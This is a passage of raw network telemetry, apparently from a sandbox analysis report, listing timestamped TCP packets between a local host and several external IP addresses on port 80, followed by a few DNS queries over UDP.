                                                                                                        Oct 10, 2024 14:47:21.772130013 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.772247076 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.772262096 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.772310972 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.772340059 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.772397041 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:21.772425890 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358140945 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358167887 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358185053 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358200073 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358216047 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358232021 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358268023 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:22.358313084 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358328104 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358336926 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:22.358400106 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:22.358401060 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358417034 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.358834028 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:22.363217115 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.363265038 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.363280058 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.363585949 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:22.445346117 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.445364952 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.445382118 CEST8050023162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:22.445472956 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:23.279134035 CEST5002380192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.298921108 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.304039001 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.304830074 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.313371897 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.318187952 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.927866936 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.927916050 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.927951097 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.927987099 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.928023100 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.928033113 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.928059101 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.928093910 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.928122044 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.928122044 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.928133011 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.928406954 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.928477049 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.928519011 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.928642035 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.932941914 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.932997942 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.933032036 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:24.933074951 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:24.982897043 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:25.020522118 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:25.020538092 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:25.020550966 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:25.020662069 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:25.024350882 CEST5002480192.168.2.4162.0.213.72
                                                                                                        Oct 10, 2024 14:47:25.029154062 CEST8050024162.0.213.72192.168.2.4
                                                                                                        Oct 10, 2024 14:47:30.054130077 CEST5002580192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:30.058958054 CEST8050025104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:30.059067011 CEST5002580192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:30.074976921 CEST5002580192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:30.079782009 CEST8050025104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:30.760703087 CEST8050025104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:30.760961056 CEST8050025104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:30.763062954 CEST5002580192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:31.576117992 CEST5002580192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:32.599028111 CEST5002680192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:32.603996038 CEST8050026104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:32.607152939 CEST5002680192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:32.619025946 CEST5002680192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:32.624099016 CEST8050026104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:33.338337898 CEST8050026104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:33.338872910 CEST8050026104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:33.338917017 CEST5002680192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:34.123100042 CEST5002680192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:35.141772032 CEST5002780192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:35.146835089 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.146914959 CEST5002780192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:35.157192945 CEST5002780192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:35.162194967 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162225008 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162251949 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162381887 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162409067 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162476063 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162503004 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162566900 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:35.162592888 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:36.342930079 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:36.343599081 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:36.343611002 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:36.343667030 CEST5002780192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:36.343667984 CEST5002780192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:36.345379114 CEST8050027104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:36.345470905 CEST5002780192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:36.673739910 CEST5002780192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:37.689960957 CEST5002880192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:37.695219994 CEST8050028104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:37.695311069 CEST5002880192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:37.703326941 CEST5002880192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:37.708334923 CEST8050028104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:38.379113913 CEST8050028104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:38.379782915 CEST8050028104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:38.379853964 CEST5002880192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:38.382939100 CEST5002880192.168.2.4104.21.21.230
                                                                                                        Oct 10, 2024 14:47:38.387834072 CEST8050028104.21.21.230192.168.2.4
                                                                                                        Oct 10, 2024 14:47:43.540251970 CEST5002980192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:43.545209885 CEST805002984.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:43.545290947 CEST5002980192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:43.600039005 CEST5002980192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:43.605062962 CEST805002984.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:44.012264967 CEST805002984.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:44.012329102 CEST5002980192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:45.108401060 CEST5002980192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:45.162241936 CEST805002984.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:46.126617908 CEST5003080192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:46.131539106 CEST805003084.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:46.135370970 CEST5003080192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:46.147264957 CEST5003080192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:46.152101040 CEST805003084.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:46.589082956 CEST805003084.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:46.589246988 CEST5003080192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:47.654834032 CEST5003080192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:47.659915924 CEST805003084.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.673392057 CEST5003180192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:48.678515911 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.678607941 CEST5003180192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:48.687830925 CEST5003180192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:48.692857027 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.692888975 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.692938089 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.692965031 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.692991972 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693097115 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693187952 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693214893 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:48.693242073 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:49.136388063 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:49.136452913 CEST5003180192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:50.201867104 CEST5003180192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:50.206938028 CEST805003184.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.221693039 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.226680040 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.226871967 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.237350941 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.242173910 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684149981 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684226036 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684263945 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684273005 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684320927 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684364080 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684396029 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684407949 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684429884 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684448004 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684462070 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684494972 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684506893 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684526920 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684564114 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:51.684566021 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.684611082 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.689697981 CEST5003280192.168.2.484.32.84.32
                                                                                                        Oct 10, 2024 14:47:51.694554090 CEST805003284.32.84.32192.168.2.4
                                                                                                        Oct 10, 2024 14:47:56.799742937 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:56.804733038 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:56.807526112 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:56.819595098 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:56.824528933 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:57.431843042 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:57.431869030 CEST8050033109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:57.431921005 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:58.326710939 CEST5003380192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.348536015 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.353391886 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.353482008 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.374453068 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:47:59.379360914 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.962954044 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.963109016 CEST8050034109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:47:59.963184118 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:00.889929056 CEST5003480192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.944483042 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.949517965 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.949628115 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.973875999 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:01.978933096 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.978985071 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979006052 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979026079 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979046106 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979082108 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979100943 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979372025 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:01.979418039 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:02.585396051 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:02.639514923 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:02.671298027 CEST8050035109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:02.671401024 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:03.483033895 CEST5003580192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.501583099 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.506752968 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:04.506911993 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.515564919 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:04.520442009 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:05.335777044 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:05.336114883 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:05.336208105 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:05.339410067 CEST5003680192.168.2.4109.234.166.180
                                                                                                        Oct 10, 2024 14:48:05.344240904 CEST8050036109.234.166.180192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.409929991 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:10.414855957 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.419795990 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:10.430226088 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:10.435261965 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.886801958 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:10.886895895 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:11.936260939 CEST5003780192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:11.942784071 CEST80500373.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:12.955714941 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:13.052773952 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:13.055938959 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:13.069466114 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:13.074305058 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:13.527718067 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:13.527786970 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:14.577940941 CEST5003880192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:14.584523916 CEST80500383.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.595892906 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:15.600876093 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.601003885 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:15.612699986 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:15.617594957 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617609024 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617624998 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617634058 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617643118 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617825031 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617834091 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617877960 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:15.617889881 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:16.087260008 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:16.087395906 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:17.123888016 CEST5003980192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:17.131762028 CEST80500393.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.142957926 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.147845030 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.148128033 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.155544996 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.160317898 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.608920097 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.608963966 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:18.611443996 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.617851019 CEST5004080192.168.2.43.33.130.190
                                                                                                        Oct 10, 2024 14:48:18.622647047 CEST80500403.33.130.190192.168.2.4
                                                                                                        Oct 10, 2024 14:48:24.594590902 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:24.599370003 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:24.599487066 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:24.678086996 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:24.684094906 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616406918 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616467953 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616503954 CEST8051587118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:25.616554976 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:25.616554976 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:26.186537027 CEST5158780192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.206526995 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.211443901 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:27.211519957 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.224622965 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:27.229506016 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:28.080588102 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:28.080621958 CEST8051588118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:28.080677986 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:28.735093117 CEST5158880192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.754645109 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.759772062 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.759845018 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.777321100 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:29.782262087 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782272100 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782363892 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782373905 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782388926 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782397985 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782404900 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782413006 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:29.782421112 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686443090 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686484098 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686537981 CEST8051589118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:30.686701059 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:31.280298948 CEST5158980192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.299016953 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.304045916 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:32.306622982 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.314378977 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:32.319264889 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:33.197685003 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:33.197762966 CEST8051590118.99.50.8192.168.2.4
                                                                                                        Oct 10, 2024 14:48:33.197843075 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:33.201734066 CEST5159080192.168.2.4118.99.50.8
                                                                                                        Oct 10, 2024 14:48:33.206521988 CEST8051590118.99.50.8192.168.2.4

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Oct 10, 2024 14:46:06.117371082 CEST5568453192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:46:06.175237894 CEST53556841.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 14:46:21.688386917 CEST5570653192.168.2.41.1.1.1
                                                                                                        Oct 10, 2024 14:46:21.752578020 CEST53557061.1.1.1192.168.2.4
                                                                                                        Oct 10, 2024 14:46:34.991847992 CEST5317853192.168.2.41.1.1.1
